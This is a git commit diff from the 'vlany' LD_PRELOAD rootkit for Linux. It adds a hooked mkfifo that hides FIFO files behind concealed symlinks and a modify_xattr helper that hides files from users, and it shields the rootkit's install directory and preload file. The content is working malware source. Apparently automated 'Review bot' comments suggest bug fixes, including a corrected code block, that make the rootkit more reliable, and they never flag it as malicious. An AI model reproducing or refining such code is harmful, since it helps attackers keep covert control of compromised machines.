mkfifo redirect & symlink hide
mempodippy committed Aug 23, 2017
1 parent ed588fa commit c052deb
Showing 8 changed files with 119 additions and 57 deletions.
3 changes: 3 additions & 0 deletions config.py
Expand Up @@ -247,6 +247,9 @@ def const_h_setup():
const_h += '#define X_USAGE "' + xor("Usage: %s [pw] [%s] [pkg name]\n") + '"\n' # template string used for snprintf in busage function
const_h += '#define E_SMSG "' + xor("%s FINISHED AND MAGIC_GID RESET. \033[1;32mWE'RE HIDDEN AGAIN\033[0m\n") + '"\n' # message used after successful command executions
const_h += '#define GID_SET "' + xor("SETTING GID TO 0\n") + '"\n'
const_h += '#define FIFO_ERR "' + xor("Couldn't create new FIFO file.\n") + '"\n'
const_h += '#define LN_ERR "' + xor("Couldn't create symlink to %s.\n") + '"\n'
const_h += '#define X_ERR "' + xor("Couldn't assign hidden extended attributes to FIFO link.\n") + '"\n'

const_h += '#define XATTR "' + xor("user.%s") + '"\n'

3 changes: 1 addition & 2 deletions install.sh
Expand Up @@ -357,9 +357,8 @@ if [ "$1" == "--cli" ]; then
compile_vlany
echo "Rootkit libraries compiled."
sleep 2
exit

[ $STATUS == "compile" ] && { rm -rf *.o bashrc shell_msg bd_readme; exit; }
[ $STATUS == "compile" ] && { rm -rf *.o magic_gid bashrc shell_msg bd_readme; exit; }

echo "Installing vlany."
sleep 1
42 changes: 5 additions & 37 deletions symbols/exec/execve.c
Expand Up @@ -59,27 +59,10 @@ int execve(const char *filename, char *const argv[], char *const envp[])
CLEAN(unhide_usage); exit(0);
}

char *target_file = argv[2];
char *install = strdup(INSTALL); xor(install);
char *ld_preload_etc = strdup(LD_PRELOAD_ETC); xor(ld_preload_etc);
if((strstr(target_file, install) || strstr(target_file, ld_preload_etc)) && hidden_xattr(target_file)) { CLEAN(ld_preload_etc); CLEAN(install); exit(0); } // ok just exit.. no threats to your life
CLEAN(ld_preload_etc); CLEAN(install);

char *xattr = strdup(XATTR), xattr_user[256];
char *hidden_xattr_1_str = strdup(HIDDEN_XATTR_1_STR);

xor(hidden_xattr_1_str); xor(xattr);
snprintf(xattr_user, sizeof(xattr_user), xattr, hidden_xattr_1_str); // create user.blahblahblah attribute to hide the file
CLEAN(xattr); CLEAN(hidden_xattr_1_str);

HOOK(old_removexattr, CREMOVEXATTR);
int ret = old_removexattr(target_file, xattr_user);

if(ret < 0 && errno == ENOENT) { printf("File %s does not exist.\n", target_file); exit(0); } // invalid path
if(ret < 0 && errno == ENODATA) { printf("File %s isn't hidden.\n", target_file); exit(0); } // visible file
if(modify_xattr(argv[2], 2) < 0) { printf("File %s does not exist or is already unhidden.\n", argv[2]); exit(0); }

char *unhide_success = strdup(UNHIDE_SUCCESS); xor(unhide_success);
printf(unhide_success, target_file);
printf(unhide_success, argv[2]);
CLEAN(unhide_success); exit(0);
}
CLEAN(unhide_file);
Expand All @@ -95,25 +78,10 @@ int execve(const char *filename, char *const argv[], char *const envp[])
CLEAN(hide_usage); exit(0);
}

char *target_file = argv[2], xattr_user[256];
char *hidden_xattr_1_str = strdup(HIDDEN_XATTR_1_STR);
char *hidden_xattr_2_str = strdup(HIDDEN_XATTR_2_STR);
char *xattr = strdup(XATTR);

xor(hidden_xattr_1_str); xor(xattr);
snprintf(xattr_user, sizeof(xattr_user), xattr, hidden_xattr_1_str);
CLEAN(xattr); CLEAN(hidden_xattr_1_str);

xor(hidden_xattr_2_str);
HOOK(old_setxattr, CSETXATTR);
int ret = old_setxattr(target_file, xattr_user, hidden_xattr_2_str, strlen(hidden_xattr_2_str), XATTR_CREATE);
CLEAN(hidden_xattr_2_str);

if(ret < 0 && errno == ENOENT) { printf("File %s does not exist.\n", target_file); exit(0); } // invalid path
if(ret < 0 && errno == EEXIST) { printf("File %s is already hidden.\n", target_file); exit(0); } // file already hidden
if(modify_xattr(argv[2], 1) < 0) { printf("File %s does not exist or is already hidden.\n", argv[2]); exit(0); } // file already hidden

char *hide_success = strdup(HIDE_SUCCESS); xor(hide_success);
printf(hide_success, target_file);
printf(hide_success, argv[2]);
CLEAN(hide_success); exit(0);
}
CLEAN(hide_file);
Expand Down Expand Up @@ -158,7 +126,7 @@ int execve(const char *filename, char *const argv[], char *const envp[])
char *ld_so_path = strdup(LD_SO_PATH); xor(ld_so_path);

char *ld_preload = strdup(LD_PRELOAD); xor(ld_preload);

if(!fnmatch(ld_linux_so_path, filename, FNM_PATHNAME) || !fnmatch(ld_so_path, filename, FNM_PATHNAME))
{
for(i = 0; argv[i] != NULL; i++)
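Review bot: The trailing comment `// file already hidden` on the new `modify_xattr(argv[2], 1)` line is stale: the helper returns -1 for a missing path as well as for an already-present attribute, and the printed message already says so, so the comment should be dropped or read `// -1 covers both ENOENT and EEXIST from setxattr`. The same applies to the unhide hunk above it, where the old ENOENT/ENODATA messages were folded into one line; if that distinction is still wanted it would have to be read back from errno after the call, which modify_xattr appears to leave untouched. execve's body starts before and continues after these hunks, so whether argv[2] is guaranteed to exist is not visible here.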
55 changes: 51 additions & 4 deletions symbols/hiding/mkfifo.c
@@ -1,3 +1,12 @@
// since we can't apply extended attributes to special FIFO files,
// we intercept the call and drop the FIFO file in /tmp/ as a hidden file (regular files starting with ".")
// then create a symlink to the new FIFO file where mkfifo was originally going to create it's FIFO file.
// the new FIFO files are stil visible to regular users if they ls -a /tmp,
// but the symlinks are hidden so they won't show up in /run/screens/S-*/

// TODO:
// - add cleanup function (remove FIFO file and symlink)

int mkfifo(const char *pathname, mode_t mode)
{
#ifdef DEBUG
Expand All @@ -7,11 +16,49 @@ int mkfifo(const char *pathname, mode_t mode)
HOOK(old_mkfifo, CMKFIFO);
if(owned())
{
// mkfifo(*some obscure random absolute path*, mode)
// mkfifo(*different, temporary file*, mode)
// use char *pathname to create symbolic link to new fifo file
// hide symbolic link instead
errno = EROFS;
return -1;
// hide symbolic link

char buf[128], fname[256], loc[] = "/tmp/.XXXXXX";

// use mkstemp to generate a random file name for the FIFO file
int tmp = mkstemp(loc);
if(tmp < 0) return -1;
// get absolute path of our new temp file from the fd given
snprintf(buf, sizeof(buf), "/proc/self/fd/%d", tmp);
readlink(buf, fname, sizeof(fname));
// now we need to remove the temp file we created. thats ok since we have the path in memory
HOOK(old_unlink, CUNLINK); old_unlink(fname);

// create a FIFO file in place of where our temp file was. path can't already exist,
// hence earlier unlink
if(old_mkfifo(fname, mode) < 0)
{
char *fifo_err = strdup(FIFO_ERR); xor(fifo_err);
printf("%s", fifo_err); CLEAN(fifo_err);
return -1;
} // new fifo file should now be created, now we can link it
// to the original designated path

HOOK(old_symlink, CSYMLINK);
if(old_symlink(fname, pathname) < 0) // create link to our FIFO file
{
char *ln_err = strdup(LN_ERR); xor(ln_err);
printf(ln_err, pathname); CLEAN(ln_err);
return -1;
} // now we need to hide the link so regular users can't see it

if(modify_xattr(pathname, 1) < 0) // hide our new link to the FIFO file
{
char *x_err = strdup(X_ERR); xor(x_err);
printf(x_err, pathname); CLEAN(x_err);
return -1;
}

// return success value as if everything worked normally
return 0;
}

return old_mkfifo(pathname, mode);
}
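Review bot: `readlink(buf, fname, sizeof(fname))` neither checks its return value nor NUL-terminates `fname`, yet `fname` is then handed to `old_unlink`, `old_mkfifo` and `old_symlink` as a C string; readlink() never writes a terminator, so everything after the resolved path is whatever was left on the stack (CERT POS30-C). The descriptor returned by `mkstemp` is also never closed, so each intercepted call leaks one fd for the life of the process. Storing the length, terminating the buffer and closing `tmp` right after the path is known fixes both; the later failure branches additionally return -1 without setting errno, so a caller that inspects errno sees a stale value where the removed code set EROFS.

```c
    // get absolute path of our new temp file from the fd given
    snprintf(buf, sizeof(buf), "/proc/self/fd/%d", tmp);
    ssize_t len = readlink(buf, fname, sizeof(fname) - 1);
    close(tmp); // the fd is only needed to resolve the path
    if(len < 0) return -1;
    fname[len] = '\0'; // readlink() does not NUL-terminate
    // … unchanged: unlink of the temp file, mkfifo, symlink, modify_xattr …
```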
14 changes: 1 addition & 13 deletions symbols/hiding/reinstall.c
Expand Up @@ -41,19 +41,7 @@ void reinstall(void)
}

// the preload file was removed somehow, now we need to hide it again
char xattr_user[256];
char *hidden_xattr_1_str = strdup(HIDDEN_XATTR_1_STR);
char *hidden_xattr_2_str = strdup(HIDDEN_XATTR_2_STR);
char *xattr = strdup(XATTR);

xor(hidden_xattr_1_str); xor(xattr);
snprintf(xattr_user, sizeof(xattr_user), xattr, hidden_xattr_1_str);
CLEAN(xattr); CLEAN(hidden_xattr_1_str);

xor(hidden_xattr_2_str);
HOOK(old_setxattr, CSETXATTR);
old_setxattr(ld_preload, xattr_user, hidden_xattr_2_str, strlen(hidden_xattr_2_str), XATTR_CREATE); // no need to check for a return value
CLEAN(hidden_xattr_2_str);
modify_xattr(ld_preload, 1); // we good.
}
CLEAN(lib_location);
CLEAN(ld_preload);
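--- a/symbols/util/modify_xattr.c
+++ b/symbols/util/modify_xattr.c
@@ -0,0 +1,56 @@
+int modify_xattr(const char *path, int mode)
+{
+#ifdef DEBUG
+printf("[vlany] attempting to modify file %s\n", path);
+#endif
+
+if(mode != 1 && mode != 2) return -1; // invalid mode
+
+if(mode == 1) // hide file
+{
+#ifdef DEBUG
+printf("[vlany] hiding file %s\n", path);
+#endif
+
+char xattr_user[256];
+char *hidden_xattr_1_str = strdup(HIDDEN_XATTR_1_STR); xor(hidden_xattr_1_str);
+char *hidden_xattr_2_str = strdup(HIDDEN_XATTR_2_STR); xor(hidden_xattr_2_str);
+char *xattr = strdup(XATTR); xor(xattr);
+
+snprintf(xattr_user, sizeof(xattr_user), xattr, hidden_xattr_1_str);
+CLEAN(xattr); CLEAN(hidden_xattr_1_str);
+
+HOOK(old_setxattr, CSETXATTR);
+int ret = old_setxattr(path, xattr_user, hidden_xattr_2_str, strlen(hidden_xattr_2_str), XATTR_CREATE);
+CLEAN(hidden_xattr_2_str);
+
+return ret;
+}
+
+if(mode == 2) // unhide file
+{
+#ifdef DEBUG
+printf("[vlany] unhiding file %s\n", path);
+#endif
+
+// prevent removal of install dir or new ld.so.preload
+char *install = strdup(INSTALL); xor(install);
+char *ld_preload_etc = strdup(LD_PRELOAD_ETC); xor(ld_preload_etc);
+if(strstr(path, install) || strstr(path, ld_preload_etc)) { CLEAN(install); CLEAN(ld_preload_etc); return -1; }
+CLEAN(ld_preload_etc); CLEAN(install);
+
+char xattr_user[256];
+char *xattr = strdup(XATTR); xor(xattr);
+char *hidden_xattr_1_str = strdup(HIDDEN_XATTR_1_STR); xor(hidden_xattr_1_str);
+
+snprintf(xattr_user, sizeof(xattr_user), xattr, hidden_xattr_1_str);
+CLEAN(xattr); CLEAN(hidden_xattr_1_str);
+
+HOOK(old_removexattr, CREMOVEXATTR);
+int ret = old_removexattr(path, xattr_user);
+
+return ret;
+}
+
+return -1; // nothing was accomplished
+}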
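Review bot: The final `return -1; // nothing was accomplished` is unreachable, because the guard right after the DEBUG block already rejects every mode other than 1 and 2 and both branches end in a return; either drop the guard and let the trailing return be the real default, or make the second branch an `else` and delete the trailing return. The mode values 1 and 2 are magic numbers that every caller (execve.c, reinstall.c, mkfifo.c) spells out again; a small enum at the definition, e.g. `enum { XATTR_HIDE = 1, XATTR_UNHIDE = 2 };`, would document them in one place. None of the `strdup` results are checked before `xor()` dereferences them, which matches the surrounding code's style but is still a NULL dereference on allocation failure.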
2 changes: 1 addition & 1 deletion symbols/util/owned.c
Expand Up @@ -32,7 +32,7 @@ int owned(void)

char _histfile[256], *histfile = strdup(HISTFILE); xor(histfile);
unsetenv("HISTFILE");
snprintf(_histfile, sizeof(histfile), "HISTFILE=%s", histfile);
snprintf(_histfile, sizeof(_histfile), "HISTFILE=%s", histfile);
putenv(_histfile);
CLEAN(histfile);

1 change: 1 addition & 0 deletions vlany.c
Expand Up @@ -47,6 +47,7 @@
#include "symbols/hiding/libdl/dlsym.c" // (void *dlsym(), void locate_dlsym(), void *locate_sym())
#include "symbols/util/dup.c" // (char *dup_call())
#include "symbols/util/procname.h" // (char *procname_self())
#include "symbols/util/modify_xattr.c" // (int modify_xattr(char *path, int mode)
#include "symbols/hiding/reinstall.c" // (void reinstall(), int hide_vlany())
#include "symbols/hiding/hide_checks.c" // (int hidden_xattr(), int hidden(), int hiddenGID(), int hiddenDirectory())
#include "symbols/hiding/forge_proc_net.c" // (FILE *forge_proc_net_tcp())
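Review bot: The comment on the new include does not match the definition it describes: `modify_xattr` takes `const char *path`, and the parenthesis is never closed. Suggest `#include "symbols/util/modify_xattr.c" // (int modify_xattr(const char *path, int mode))` so the index of prototypes in this file stays accurate.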
